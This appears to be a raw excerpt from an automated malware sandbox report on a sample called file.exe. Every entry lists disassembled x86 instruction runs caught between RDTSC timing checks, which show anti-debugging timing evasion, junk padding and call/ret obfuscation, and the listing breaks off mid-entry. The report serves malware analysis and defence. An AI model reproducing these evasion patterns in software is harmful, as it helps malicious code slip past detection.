Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 909531 second address: 90953F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F02BCD63866h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90953F second address: 909560 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F02BD1AD2F9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 909560 second address: 909566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953241 second address: 953245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953245 second address: 95324B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9537F3 second address: 95380F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F02BD1AD2F7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954D42 second address: 954D5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BCD63879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954EF7 second address: 954EFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954EFD second address: 954F0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954F0C second address: 954F12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955016 second address: 95501B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95541F second address: 955429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955429 second address: 955441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnc 00007F02BCD63866h 0x00000011 jne 00007F02BCD63866h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955441 second address: 955446 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9554D4 second address: 955511 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F02BCD63866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F02BCD63868h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], ebx 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F02BCD63868h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 movzx edi, di 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955511 second address: 955517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95591D second address: 955922 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9559E5 second address: 9559E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 957A19 second address: 957A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 957246 second address: 957261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 957A22 second address: 957A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 957261 second address: 957265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9583E0 second address: 9583F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BCD6386Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 958E8E second address: 958E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 958BD3 second address: 958BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 958E92 second address: 958EAC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F02BD1AD2E8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F02BD1AD2E8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A34F second address: 95A38F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BCD63879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007F02BCD63866h 0x00000010 jmp 00007F02BCD63874h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A38F second address: 95A3EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F02BD1AD2E8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 movzx esi, si 0x00000025 jne 00007F02BD1AD2E6h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F02BD1AD2E8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov si, cx 0x0000004a push 00000000h 0x0000004c movsx esi, di 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A3EB second address: 95A3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A0CD second address: 95A0E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A3EF second address: 95A3F9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F02BCD63866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A3F9 second address: 95A418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02BD1AD2ECh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e js 00007F02BD1AD2F4h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A418 second address: 95A41C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95AF00 second address: 95AF06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95C9A4 second address: 95C9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95C9A8 second address: 95C9AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AFF5 second address: 90B01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007F02BCD63881h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B01B second address: 90B020 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95FA75 second address: 95FA7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 961A8B second address: 961A95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F02BD1AD2E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 963B7B second address: 963B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 964AA1 second address: 964AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 966AF6 second address: 966B39 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor edi, 7DFDED36h 0x0000000f push 00000000h 0x00000011 mov bh, BBh 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F02BCD63868h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov dword ptr [ebp+124632B5h], eax 0x00000035 stc 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c pushad 0x0000003d popad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 966B39 second address: 966B3E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 964C8A second address: 964C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 964C8E second address: 964C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 964C92 second address: 964C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 964C98 second address: 964CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F02BD1AD2E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 965C6C second address: 965C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F02BCD63866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 966CAB second address: 966CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 966CB0 second address: 966CBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F02BCD63866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 966CBA second address: 966CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 966CBE second address: 966CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 966CCC second address: 966CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 966D71 second address: 966D84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F02BCD63866h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96AAA1 second address: 96AAC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F02BD1AD2E8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96BB00 second address: 96BB04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CACE second address: 96CB8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jl 00007F02BD1AD300h 0x00000011 push edx 0x00000012 jmp 00007F02BD1AD2F8h 0x00000017 pop edx 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F02BD1AD2E8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 sbb ebx, 66ABE5FBh 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F02BD1AD2E8h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 sub dword ptr [ebp+122D3292h], edi 0x0000005b push 00000000h 0x0000005d and edi, dword ptr [ebp+122D32ADh] 0x00000063 movzx edi, dx 0x00000066 xchg eax, esi 0x00000067 jmp 00007F02BD1AD2F4h 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F02BD1AD2EFh 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 968D0A second address: 968D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96AC0C second address: 96AC1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96AC1B second address: 96AC25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F02BCD63866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 967D50 second address: 967D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96AC25 second address: 96AC29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96DAAC second address: 96DAB6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F02BD1AD2ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96CCE2 second address: 96CCFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F02BCD6386Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E9EA second address: 96E9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E9EF second address: 96EA02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F02BCD6386Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EA02 second address: 96EA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96DCD0 second address: 96DCD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EA06 second address: 96EA0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96DCD6 second address: 96DCDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EA0C second address: 96EA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9715D6 second address: 9715FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BCD63875h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jnc 00007F02BCD63866h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9715FD second address: 971602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 971602 second address: 971607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973E82 second address: 973E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2F9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91F4E2 second address: 91F4E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91F4E6 second address: 91F4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91F4EC second address: 91F50E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BCD63876h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F02BCD63866h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91F50E second address: 91F542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F02BD1AD2E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F02BD1AD2F5h 0x00000016 jmp 00007F02BD1AD2EFh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91F542 second address: 91F556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F02BCD6386Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91F556 second address: 91F57B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F02BD1AD2E6h 0x00000008 jmp 00007F02BD1AD2F7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91F57B second address: 91F57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91F57F second address: 91F585 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91BE21 second address: 91BE45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F02BCD63876h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 979E77 second address: 979E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F02BD1AD2E8h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 979E88 second address: 979E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 979629 second address: 979642 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F02BD1AD2EFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 979642 second address: 97964A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97964A second address: 979678 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F02BD1AD2E8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jno 00007F02BD1AD2F5h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F02BD1AD2E8h 0x0000001a push edi 0x0000001b pop edi 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 979678 second address: 97969A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BCD63877h 0x00000009 jg 00007F02BCD63866h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97EFD8 second address: 97EFDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97F28A second address: 7A184E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F02BCD63871h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 67FDE9F5h 0x00000012 je 00007F02BCD6387Ah 0x00000018 jmp 00007F02BCD63874h 0x0000001d push dword ptr [ebp+122D1335h] 0x00000023 stc 0x00000024 call dword ptr [ebp+122D1CE7h] 0x0000002a pushad 0x0000002b pushad 0x0000002c sub dword ptr [ebp+122D1B79h], edx 0x00000032 mov dword ptr [ebp+122D1B79h], edx 0x00000038 popad 0x00000039 xor eax, eax 0x0000003b jnl 00007F02BCD6386Ch 0x00000041 sub dword ptr [ebp+122D1B79h], eax 0x00000047 mov edx, dword ptr [esp+28h] 0x0000004b jbe 00007F02BCD6386Ch 0x00000051 mov dword ptr [ebp+122D1BA0h], ebx 0x00000057 mov dword ptr [ebp+122D3461h], eax 0x0000005d or dword ptr [ebp+122D1BA0h], esi 0x00000063 mov esi, 0000003Ch 0x00000068 